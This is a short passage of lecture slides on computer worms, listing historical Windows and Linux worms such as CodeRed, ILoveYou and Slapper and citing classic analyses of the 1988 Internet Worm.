•Anything: arbitrary code means arbitrary code
An Ongoing Threat
•Windows:
• CodeRed (IIS), CodeRedII(IIS), Klez(OL),
ILoveYou(OL), Magistr(OL), AnnaKournikova(OL),
SirCam...
•Linux:
• Slapper (Apache), Ramen(wu-ftpd+), Lion(bind)...
28. References
The Internet Worm Program: An Analysis Eugene H. Spafford
Remembering the Net Crash of ‘88 Bob Sullivan
A Tour of the Worm Donn Seeley
A report on internet worm Bob Page